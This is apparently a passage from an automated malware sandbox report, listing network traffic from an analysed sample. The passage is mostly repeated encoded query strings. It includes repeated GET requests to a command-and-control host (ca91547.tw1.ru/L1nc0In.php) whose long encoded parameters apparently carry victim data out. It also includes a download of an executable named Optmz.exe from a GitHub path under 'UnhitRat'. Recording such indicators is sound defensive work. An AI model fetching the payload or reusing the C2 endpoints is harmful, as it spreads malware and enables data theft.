jMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /UnhitRat/Avast/refs/heads/main/Optmz.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU&42967b720727e4e345f9f350ee86f808=b2c0a37eb61845d3c0e712bac039aad1&438f148c0e5f9286e56e53eb6890b7d4=QOxEmYzIDMjNGOxEWY5cDZyYzY1kTMkNjM5EjY0MTOiRjNjNzNlVTN&kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&71411a4c54be7086c59f1fd61c0b5f77=0VfiIiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiI5EmMiNTMjJTN5EmZjFDZjZDN5kTMyYmYkRjY2cDOiZjZ2YmNwM2NxIiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&9cf44557760a31b9394c29aa9649d97b=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiI5EmMiNTMjJTN5EmZjFDZjZDN5kTMyYmYkRjY2cDOiZjZ2YmNwM2NxIiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&71411a4c54be7086c59f1fd61c0b5f77=QX9JSUNJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIxQjNiRGO3QGM1UjM3YzN4MjN0UzMkN2M4gTOlFWYjNGZ5ITNyIWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0